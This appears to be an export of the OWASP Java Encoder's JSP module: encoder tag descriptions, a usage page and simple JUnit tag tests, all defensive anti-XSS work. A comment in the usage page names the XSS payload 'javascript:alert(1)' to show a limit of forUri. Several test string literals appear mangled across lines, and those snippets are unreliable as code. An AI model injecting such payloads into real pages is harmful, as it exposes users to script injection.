value to be written out value true true java.lang.String

Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method ensures that special characters in the component do not get interpreted as part of another component.
forUriComponent forUriComponent org.owasp.encoder.tag.ForUriComponentTag empty
value to be written out value true true java.lang.String

Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML.
forCssString forCssString org.owasp.encoder.tag.ForCssStringTag empty
value to be written out value true true java.lang.String

Encodes for (X)HTML text content and text attributes.
forHtml forHtml org.owasp.encoder.Encode java.lang.String forHtml(java.lang.String) forHtml(unsafeData)

This method encodes for HTML text content. It does not escape quotation characters and is thus unsafe for use with HTML attributes. Use either forHtml or forHtmlAttribute for those contexts.
forHtmlContent forHtmlContent org.owasp.encoder.Encode java.lang.String forHtmlContent(java.lang.String) forHtmlContent(unsafeData)

Encodes for HTML text attributes.
forHtmlAttribute org.owasp.encoder.Encode java.lang.String forHtmlAttribute(java.lang.String) forHtmlAttribute(unsafeData)

Encodes for unquoted HTML attribute values. forHtml(String) or forHtmlAttribute(String) should usually be preferred over this method as quoted attributes are XHTML compliant.
forHtmlUnquotedAttribute forHtmlUnquotedAttribute org.owasp.encoder.Encode java.lang.String forHtmlUnquotedAttribute(java.lang.String) forHtmlUnquotedAttribute(unsafeData)

Encodes for CSS strings. The context must be surrounded by quotation characters. It is safe for use in both style blocks and attributes in HTML.
forCssString forCssString org.owasp.encoder.Encode java.lang.String forCssString(java.lang.String) forCssString(unsafeData)

Encodes for CSS URL contexts. The context must be surrounded by "url()". It is safe for use in both style blocks and attributes in HTML. Note: this does not do any checking on the quality or safety of the URL itself. The caller should ensure that the URL is safe for embedding (e.g. input validation) by other means.
forCssUrl forCssUrl org.owasp.encoder.Encode java.lang.String forCssUrl(java.lang.String) forCssUrl(unsafeData)

Performs percent-encoding of a URL according to RFC 3986. The provided URL is assumed to be a valid URL. This method does not do any checking on the quality or safety of the URL itself. In many applications it may be better to use java.net.URI instead. Note: this is a particularly dangerous context to put untrusted content in, as for example a "javascript:" URL provided by a malicious user would be "properly" escaped, and still execute.
forUri forUri org.owasp.encoder.Encode java.lang.String forUri(java.lang.String) forUri(unsafeData)

Performs percent-encoding for a component of a URI, such as a query parameter name or value, path or query-string. In particular this method ensures that special characters in the component do not get interpreted as part of another component.
forUriComponent forUriComponent org.owasp.encoder.Encode java.lang.String forUriComponent(java.lang.String) forUriComponent(unsafeData)

Encodes for XML and XHTML.
forXml forXml org.owasp.encoder.Encode java.lang.String forXml(java.lang.String) forXml(unsafeData)

Encodes for XML text content. It does not escape quotation characters and is thus unsafe for use with XML attributes. Use either forXml or forXmlAttribute for those contexts.
forXmlContent forXmlContent org.owasp.encoder.Encode java.lang.String forXmlContent(java.lang.String) forXmlContent(unsafeData)

Encodes for XML and XHTML attribute content.
forXmlAttribute forXmlAttribute org.owasp.encoder.Encode java.lang.String forXmlAttribute(java.lang.String) forXmlAttribute(unsafeData)

Encodes data for an XML CDATA section. On the chance that the input contains a terminating "]]>", it will be replaced by "]]>]]<![CDATA[>". As with all XML contexts, characters that are invalid according to the XML specification will be replaced by a space character. Caller must provide the CDATA section boundaries.
forCDATA forCDATA org.owasp.encoder.Encode java.lang.String forCDATA(java.lang.String) forCDATA(unsafeData)

Encodes for a JavaScript string. It is safe for use in HTML script attributes (such as onclick), script blocks, JSON files, and JavaScript source. The caller MUST provide the surrounding quotation characters for the string.
forJavaScript forJavaScript org.owasp.encoder.Encode java.lang.String forJavaScript(java.lang.String) forJavaScript(unsafeData)
owasp-java-encoder-1.2.3/jsp/src/site/
owasp-java-encoder-1.2.3/jsp/src/site/markdown/
owasp-java-encoder-1.2.3/jsp/src/site/markdown/index.md
## OWASP JSP

The OWASP JSP Encoder is a collection of high-performance low-overhead contextual encoders that, when utilized correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting (XSS). Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) for more information on preventing XSS.

### JSP Usage

The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that includes tags and a set of JSP EL functions:

```xml
<dependency>
    <groupId>org.owasp.encoder</groupId>
    <artifactId>encoder-jsp</artifactId>
    <version>1.2.2</version>
</dependency>
```

```JSP
<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %>
<%-- ... --%>
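<%-- Added example lines, not from the project's README: the same request
     parameter rendered in four contexts, each through the encoder for that
     context. param.value and safeNextUrl are assumed names. --%>
<a href="/search?q=${e:forUriComponent(param.value)}"
   title="${e:forHtmlAttribute(param.value)}">${e:forHtml(param.value)}</a>
<script>
    <%-- the page supplies the quotes; forJavaScript escapes < and > as well,
         so a closing script tag inside the value cannot end this block --%>
    var q = '${e:forJavaScript(param.value)}';
</script>
<style>
    <%-- CSS string context: quotes supplied by the page, as with JavaScript --%>
    .hint::after { content: '${e:forCssString(param.value)}'; }
</style>
<%-- forUri percent-encodes a whole URL but does not judge it: a value of
     javascript:alert(1) comes through encoding unchanged and still runs when
     clicked. safeNextUrl is assumed to have passed a scheme allow-list (https
     or site-relative path only) in the controller before reaching this page. --%>
<a href="${e:forUri(safeNextUrl)}">next</a>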

<div>
    Dynamic data via EL: ${e:forHtml(param.value)}

    Dynamic data via tag:
    <e:forHtml value="${param.value}" />
</div>
```
owasp-java-encoder-1.2.3/jsp/src/site/site.xml
owasp-java-encoder-1.2.3/jsp/src/test/
owasp-java-encoder-1.2.3/jsp/src/test/java/
owasp-java-encoder-1.2.3/jsp/src/test/java/org/
owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/
owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/
owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/
owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

import junit.framework.TestCase;
import org.springframework.mock.web.MockHttpServletRequest;
import org.springframework.mock.web.MockHttpServletResponse;
import org.springframework.mock.web.MockPageContext;
import org.springframework.mock.web.MockServletContext;

/**
 * EncodingTagTest is the base class for all unit tests for the tags.
 * This sets up the ServletContext so that tags can be tested.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public abstract class EncodingTagTest extends TestCase {

    protected MockServletContext _servletContext;
    protected MockPageContext _pageContext;
    protected MockHttpServletRequest _request;
    protected MockHttpServletResponse _response;

    /**
     * Constructor for the EncodingTagTest
     * @param testName the name of the test
     */
    public EncodingTagTest(String testName) {
        super(testName);
    }

    @Override
    protected void setUp() throws Exception {
        super.setUp();
        // A fresh mock page per test: whatever a tag writes to the JspWriter
        // ends up in _response, where the test can read it back.
        _servletContext = new MockServletContext();
        _request = new MockHttpServletRequest();
        _response = new MockHttpServletResponse();
        _pageContext = new MockPageContext(_servletContext, _request, _response);
    }

    @Override
    protected void tearDown() throws Exception {
        super.tearDown();
    }
}
owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java
// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions
// are met:
//
//     * Redistributions of source code must retain the above
//       copyright notice, this list of conditions and the following
//       disclaimer.
//
//     * Redistributions in binary form must reproduce the above
//       copyright notice, this list of conditions and the following
//       disclaimer in the documentation and/or other materials
//       provided with the distribution.
//
//     * Neither the name of the OWASP nor the names of its
//       contributors may be used to endorse or promote products
//       derived from this software without specific prior written
//       permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
// STRICT LIABILITY, OR TORT (IN CLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
// OF THE POSSIBILITY OF SUCH DAMAGE.

package org.owasp.encoder.tag;

/**
 * Simple tests for the ForCDATATag.
 *
 * @author Jeremy Long (jeremy.long@gmail.com)
 */
public class ForCDATATagTest extends EncodingTagTest {

    public ForCDATATagTest(String testName) {
        super(testName);
    }

    @Override
    protected void setUp() throws Exception {
        super.setUp();
    }

    @Override
    protected void tearDown() throws Exception {
        super.tearDown();
    }

    /**
     * Test of doTag method, of class ForCDATATag.
     * This is a very simple test that doesn't fully
     * exercise/test the encoder - only that the
     * tag itself works.
     * @throws Exception is thrown if the tag fails.
     */
    public void testDoTag() throws Exception {
        System.out.println("doTag");
        ForCDATATag instance = new ForCDATATag();
        String value = "
    ]]>
    "; String expected = "
    ]]]]>
    "; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java000066400000000000000000000053131375203724500313360ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForCssStringTag. 
* * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssStringTagTest extends EncodingTagTest { public ForCssStringTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForCssStringTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForCssStringTag instance = new ForCssStringTag(); String value = "
    "; String expected = "\\3c div\\3e"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java000066400000000000000000000052661375203724500306410ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. 
package org.owasp.encoder.tag; /** * Simple tests for the ForCssUrlTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForCssUrlTagTest extends EncodingTagTest { public ForCssUrlTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForCssUrlTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForCssUrlTag instance = new ForCssUrlTag(); String value = "\\';"; String expected = "\\5c\\27;"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected, results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java000066400000000000000000000053371375203724500322150ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. 
// // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlAttributeTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlAttributeTagTest extends EncodingTagTest { public ForHtmlAttributeTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlAttributeTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlAttributeTag instance = new ForHtmlAttributeTag(); String value = "
    "; String expected = "<div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java000066400000000000000000000053261375203724500316620ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. 
package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlContentTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlContentTagTest extends EncodingTagTest { public ForHtmlContentTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlContentTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlContentTag instance = new ForHtmlContentTag(); String value = "
    "; String expected = "<div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java000066400000000000000000000052541375203724500303270ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlTag. 
* * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlTagTest extends EncodingTagTest { public ForHtmlTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlTag instance = new ForHtmlTag(); String value = "
    "; String expected = "<div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } ForHtmlUnquotedAttributeTagTest.java000066400000000000000000000054561375203724500336650ustar00rootroot00000000000000owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. 
package org.owasp.encoder.tag; /** * Simple tests for the ForHtmlUnquotedAttributeTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForHtmlUnquotedAttributeTagTest extends EncodingTagTest { public ForHtmlUnquotedAttributeTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForHtmlUnquotedAttributeTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForHtmlUnquotedAttributeTag instance = new ForHtmlUnquotedAttributeTag(); String value = "
    "; String expected = "<div> </div>"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java000066400000000000000000000054161375203724500333550ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. 
package org.owasp.encoder.tag; /** * Simple tests for the ForJavaScriptAttributeTag. * * @author Jeremy Long (jeremy.long@gmail.com) */ public class ForJavaScriptAttributeTagTest extends EncodingTagTest { public ForJavaScriptAttributeTagTest(String testName) { super(testName); } @Override protected void setUp() throws Exception { super.setUp(); } @Override protected void tearDown() throws Exception { super.tearDown(); } /** * Test of doTag method, of class ForJavaScriptAttributeTag. * This is a very simple test that doesn't fully * exercise/test the encoder - only that the * tag itself works. * @throws Exception is thrown if the tag fails. */ public void testDoTag() throws Exception { System.out.println("doTag"); ForJavaScriptAttributeTag instance = new ForJavaScriptAttributeTag(); String value = "
    \"\'"; String expected = "
    \\x22\\x27"; instance.setJspContext(_pageContext); instance.setValue(value); instance.doTag(); String results = _response.getContentAsString(); assertEquals(expected,results); } } owasp-java-encoder-1.2.3/jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java000066400000000000000000000053571375203724500324500ustar00rootroot00000000000000// Copyright (c) 2012 Jeff Ichnowski // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above // copyright notice, this list of conditions and the following // disclaimer. // // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following // disclaimer in the documentation and/or other materials // provided with the distribution. // // * Neither the name of the OWASP nor the names of its // contributors may be used to endorse or promote products // derived from this software without specific prior written // permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS // FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE // COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, // INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES // (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) // HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. 
